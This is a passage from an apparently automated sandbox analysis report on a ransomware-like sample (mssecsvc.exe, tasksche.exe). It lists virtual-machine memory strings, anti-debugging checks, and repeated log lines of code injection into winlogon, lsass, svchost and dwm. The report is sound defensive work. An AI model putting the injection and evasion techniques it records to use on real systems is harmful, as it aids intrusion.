              Source: svchost.exe, 00000021.00000000.360470749.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@Allow outbound TCP traffic for vmicheartbeatLMEM`P
              Source: dwm.exe, 0000001A.00000000.309719728.0000026F1A051000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
              Source: svchost.exe, 00000016.00000002.784873696.0000025E76048000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: .@vmicshutdown-block-in
              Source: dwm.exe, 0000001A.00000002.789069661.0000026F1791C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000008
              Source: svchost.exe, 00000021.00000002.792446204.00000219BF800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $@Allow outbound TCP traffic for vmicheartbeat
              Source: svchost.exe, 00000021.00000000.360470749.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@Allow inbound TCP port 389 traffic for vmicheartbeatLMEMp
              Source: svchost.exe, 00000027.00000002.786558352.000002631D63F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.389828938.000002631D63F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@Microsoft-Windows-Hyper-V-Hypervisor
              Source: svchost.exe, 00000023.00000002.788068180.0000029A96A29000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000_0r
              Source: svchost.exe, 0000000F.00000000.292405111.000001BC27288000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
              Source: mssecsvc.exe, 00000004.00000000.263399045.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000008.00000000.265918603.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000C.00000000.275826042.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000C.00000002.351059064.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 0000001F.00000000.342421890.0000000000410000.00000002.00000001.01000000.00000007.sdmp, y2jb4FtSNq.dll, tasksche.exe.8.dr, mssecsvc.exe.2.drBinary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Common-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catp
              Source: svchost.exe, 0000000F.00000000.293363867.000001BC27C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicshutdown
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@vmicheartbeat-allow-in-1
              Source: svchost.exe, 0000000F.00000000.281621488.000001BC27436000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicvss
              Source: svchost.exe, 0000000F.00000002.791275614.000001BC27436000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $@vmicshutdown
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@vmicvss
              Source: svchost.exe, 00000027.00000003.675884026.000002631EA53000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
              Source: svchost.exe, 00000016.00000002.785226651.0000025E7605B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@Allow inbound TCP port 389 traffic for vmicheartbeat
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @vmicshutdown
              Source: svchost.exe, 0000000F.00000000.293363867.000001BC27C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@vmicshutdown-block-out
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@vmicheartbeat-block-in
              Source: lsass.exe, 0000000B.00000000.280986933.0000025D3327E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
              Source: svchost.exe, 00000027.00000000.394201292.000002631E28B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.0NULLSCSI0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\4&2509f6e&0&00A8
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@Block any outbound traffic for vmicvss
              Source: lsass.exe, 0000000B.00000000.271534520.0000025D33213000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.280867900.0000025D33213000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.783948222.0000025D33213000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.783516257.0000029B07628000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.785715887.000001A4BAC64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.784070090.0000028416C29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.788615829.00000219BE6B4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.356180810.00000219BE6B4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.783810031.000001CC4D229000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000022.00000000.365673118.000001CC4D229000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.372190291.0000029A96A40000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: svchost.exe, 00000021.00000000.360470749.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Allow inbound TCP port 636 traffic for vmicheartbeatLMEMp
              Source: lsass.exe, 0000000B.00000000.280986933.0000025D3327E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
              Source: svchost.exe, 00000021.00000002.792446204.00000219BF800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Block any inbound traffic for vmicshutdown
              Source: svchost.exe, 0000001D.00000002.675684049.00000159FC261000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@Hyper-V RAW
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: .@vmicshutdown
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: .@vmicheartbeat-allow-in-2
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @vmicvss
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $@vmicheartbeat
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: .@vmicheartbeat
              Source: svchost.exe, 00000027.00000002.786558352.000002631D63F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.389828938.000002631D63F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $Microsoft-Windows-Hyper-V-Hypervisor
              Source: svchost.exe, 00000010.00000002.782222088.0000029B07602000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
              Source: lsass.exe, 0000000B.00000000.280986933.0000025D3327E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
              Source: svchost.exe, 00000021.00000002.792446204.00000219BF800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@Block any outbound traffic for vmicshutdown
              Source: mssecsvc.exeBinary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integration-Driver
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: .@Allow inbound TCP port 636 traffic for vmicheartbeat
              Source: svchost.exe, 00000021.00000000.360470749.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Allow inbound TCP port 389 traffic for vmicheartbeatLMEMp
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $@Block any inbound traffic for vmicvss
              Source: svchost.exe, 00000027.00000003.675884026.000002631EA53000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 2.0 NULL
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@vmicvss-block-in
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @vmicheartbeat
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC3D36 LoadLibraryA,GetProcAddress,LoadLibraryA,GetTickCount,GetVolumeInformationA,GetModuleFileNameA,wsprintfA,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateEventA,socket,connect,GetVersionExA,wsprintfA,CreateThread,CloseHandle,GetTickCount,4_2_00AC3D36
              Source: C:\Windows\tasksche.exeCode function: 31_2_004029CC free,GetProcessHeap,HeapFree,31_2_004029CC
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC042D rdtsc 4_2_00AC042D
              Source: C:\Windows\mssecsvc.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\mssecsvc.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC05F2 mov eax, dword ptr fs:[00000030h]4_2_00AC05F2
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC042D mov eax, dword ptr fs:[00000030h]4_2_00AC042D
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC025E mov edx, dword ptr fs:[00000030h]4_2_00AC025E
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA05F2 mov eax, dword ptr fs:[00000030h]4_2_7FEA05F2
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA025E mov edx, dword ptr fs:[00000030h]4_2_7FEA025E
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA042D mov eax, dword ptr fs:[00000030h]4_2_7FEA042D
              Source: C:\Windows\mssecsvc.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Maps a DLL or memory area into another process
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\winlogon.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\lsass.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\dwm.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\winlogon.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\lsass.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\jjetVt target: C:\Windows\System32\dwm.exe protection: execute and read and writeJump to behavior
              Changes memory attributes in foreign processes to executable or writable
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774C9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 774CA040 protect: page execute and read and writeJump to behavior
